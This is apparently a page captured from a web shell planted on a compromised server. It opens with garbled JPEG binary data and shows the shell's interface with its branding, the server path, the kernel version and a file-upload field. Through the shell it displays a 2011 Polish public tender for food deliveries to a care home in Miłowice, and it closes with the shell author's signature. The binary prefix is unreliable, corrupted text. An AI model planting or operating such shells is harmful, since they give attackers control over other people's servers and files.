JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110114/5680-N-2011.html

<p class="kh_header"><b>Żary: Dostawa artykułów żywnościowych do Domu Pomocy Społecznej w 
Miłowicach z podziałem na zadania</b><br>
<b>Numer ogłoszenia: 5680 - 2011; data zamieszczenia: 14.01.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Miłowicach , Miłowice 26, 68-200 Żary, woj. lubuskie, tel. 0-68 374-38-22, faks 0-68 374-38-22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dps.powiatzarski.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Domu Pomocy Społecznej w 
Miłowicach z podziałem na zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie1. Dostawa mięsa, wyrobów mięsnych, wędlin i drobiu 

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Antrykot zk	151	Kg	200
2.	Boczek surowy	151	Kg	140
3.	Karkówka z kością	151	Kg	400
4.	Karkówka bez kości	151	Kg	100
5	Łopatka bez kości	151	Kg	640
6.	Mielonka klopsowa 	151	Kg	160
7.	Wątróbka wieprzowa	151	Kg	50
8.	Filet z piersi kurczaka	151	Kg	160
9.	Kurczaki	151	Kg	1200
10.	Udka z kurczaka	151	Kg	280
11.	Wątróbka drobiowa	151	Kg	230
12.	Żołądki drobiowe	151	Kg	20
13.	Kaszanka	151	Kg	50
14.	Pasztetowa drobiowa	151	Kg	45
15.	Salceson włoski	151	Kg	70
16.	Boczek faszerowany	151	Kg	70
17.	Baleron	151	Kg	20
18.	Kiełbasa śląska	151	Kg	420
19.	Kiełbasa zwyczajna	151	Kg	100
20.	Kiełbasa biała parzona	151	Kg	35
21.	Metka łososiowa	151	Kg	80
22.	Mielonka kanapkowa	151	Kg	104
23.	Mortadela drobiowa	151	Kg	120
24.	Ogonówka	151	Kg	110
25.	Polędwica drobiowa	151	Kg	100
26.	Parówki drobiowe	151	Kg	80
27.
28.
29.
30.
31.	Rolada drobiowa
Szynka gotowana
Schab bez kości
Szynka  wiejska
Flaki wołowe	151
151
151
151
151	Kg
kg
kg
kg
kg	15
40
60
30
30

Zadanie 2. Dostawa warzyw i owoców mrożonych

1.	Brokuły mrożone	153	Kg	250
2.	Brukselka mrożona	153	Kg	150
3.	Fasolka szparag. mrożona	153	Kg	60
4.	Kalafior mrożony	153	Kg	240
5.	Mieszanka kompotowa	153	Kg	350
6.	Marchewka z groszkiem	153	Kg	200


Zadanie 3. Dostawa dżemów, marmolady, warzyw i owoców przetworzonych

1.	Ćwikła z chrzanem	153	szt	30
2.	Dżemy owocowe 	153	kg	90
3.	Fasolka szparagowa konserwowa  470 g	153	szt	600
4.	Groszek konserwowy 400 g	153	szt	400
5.	Jabłka prażone 	153	Szt.	62
6.	Koncentrat pomidorowy  o,9 l
Pudliszki	153	szt	81
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
	Kukurydza konserwowa 400 g
Marmolada
Miód
Ogórki konserwowe 0,9 l
Ogórki konserwowe  1.700 ml
Przecier ogórkowy 350 g
Papryka konserwowa 1,7 kg 
Papryka konserwowa  0,9 l
Sałatka szwedzka 0,9 l
Sałatka wielowarzywna 0,9 l	153
153
153
153
153
153
153
153
153
153	Szt.
Kg
L
szt
szt
szt
szt
szt
szt
szt	60
30
19
300
200
150
20
60
242
390



Zadanie 4. Dostawa mleka i artykułów nabiałowych pochodzenia roślinnego

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Jogurty naturalne  400 g	155	Szt	380
2.	Jogurty owocowe  150g	155	Szt	600
3.	Margaryna zwykła	155	kg	500
4.	Masło extra  82 %   200g	155	Kg	950
5.	Mleko w folii 2%	155	Litr	8800
6.	Margaryna do smarowania	155	Kg	45
7.	Mleko w proszku 	155	Kg	12
8.	Olej	155	L	650
9.	Ser topiony	155	Kg	60
10.	Śmietana 18 %	155	L	1000
11.	Ser żółty	155	Kg	310
12.	Twarożek  kanapkowy  200 g	154	szt	1300
13.	Serek wiejski  200 g	154	Szt	800
14.
	Twaróg półtłusty
	154
	Kg
	450





Zadanie 5. Dostawa pieczywa

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Chleb zwykły krojony Baltonowski	158	Szt	2800
2.	Chleb pszenny krojony	158	Szt	550
3.	Chleb wieloziarnisty krojony	158	Szt	3000
4.	Bułki zwykłe duże	158	Szt	3300
5.	Bułka tarta	158	Kg	150
6.
7.	Pączki
Ciasta różne (sernik,biszkoptowe,orzechowiec)	158
158	szt
kg	400

100

Zadanie 6. Dostawa artykułów mącznych, przypraw i dodatków suchych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Koperek suszony	156	szt	30
2.	Maga w płynie	156	L	45
3.	Majeranek 	156	szt	40
4.	Przyprawa gyros 	156	szt	67
5.	Przyprawa do ryb 	156	szt	50
6.	Papryka mielona czerwona	156	szt	14
7.	Pieprz mielony 	156	kg	20
8.	Warzywko	156	kg	160
9.	Ziele angielskie 	156	szt	30
10.	Barszcz biały Winiary	158	kg	11
11.	Cukierki mieszanka 	158	kg	20 
12. 	Cukier waniliowy	158	Szt	65
13.	Cukier puder	158	Kg	30
14.	Czosnek suszony  granulowany	158	szt	150
15.	Cukier kryształ	158	Kg	2000
16.	Ciastka kruche	158	kg	30
17.	Galaretki owocowe	158	Szt	60
18.	Herbata  granulowana  100 g	158	Szt	1450
19.	Kawa Inka 150 g	158	szt	292
20.	Kakao 100 g	158	szt	250
21.	Kisiele owocowe (40g)	158	szt	910
22.	Ketchup  łagodny 500g	158	szt	125
23.	Konserwy mięsne  300 g	158	szt	526
24.	Kasza manna	158	Kg	154
25.	Zupa pieczarkowa Winiary	158	kg	30
26.	Otręby pszenne	158	szt	70
27.	Żurek  Winiary	158	kg	40
28	Sól spożywcza	158	kg	280
29.	Kasza jęczmienna 	158	kg	30
30.	Mąka tortowa	158	Kg	160
31.	Mąka pszenna	158	kg	90
32.	Mąka ziemniaczana	158	kg	50
33.	Makaron nitki  Abak	158	kg	100
34.	Makaron świderki  Abak	158	kg	300
35.	Musztarda ( 200g )	158	szt	450
36.	Ocet (0,5 l)	158	szt	20
37.	Pasztet drobiowy  (135g)	158	szt	600
38.	Płatki kukurydziane	158	kg	50
39.	Płatki owsiane	158	szt	70
40.	Proszek do pieczenia 	158	szt	30
41.	Ryż	158	Kg	270
42.	Rodzynki  (400g)	158	szt	20
43.	Majonez ( 700ml) Winiary	158	szt	200

Zadanie 7. Dostawa ryb i przetworów rybnych

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Ryba mrożona Mintaj  	152	Kg	200
2.	Ryba mrożona Morszczuk 	152	kg	200
3.	Tuńczyk w sosie własnym 185g	152	szt	220
4.	Paprykarz szczeciński  300g	152	Szt	30
5.	Szproty w pomidorach lub w oleju  330g	152	Szt	400
6.	Filety śledziowe Matjas	152	Kg	130
7.	Ryba wędzona  Makrela	152	Kg	40
Zadanie 8. Dostawa jaj

Lp.	Nazwa towaru	Nr wg CPV	Jedn.
miary	Ilość
( w skali roku)
1.	Jajka średnie	124	Szt	17.300.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-  aktualny odpis z właściwego rejestru sądowego albo aktualne 
zaświadczenie o wpisie do ewidencji gospodarczej , wystawione nie wcześniej 
niż 6 miesięcy przed upływem terminu składania ofert
- parafowany na każdej stronie wzór umowy
- wypełniony formularz ofertowy
-wypełnione oświadczenie o spełnieniu warunków udziału w postępowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dps.powiatzarski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Miłowicach , Miłowice 26 poczta:68-200 Żary.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2011 godzina 10:00, miejsce: Dom Pomocy Społecznej w Miłowicach , Miłowice 26 -sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com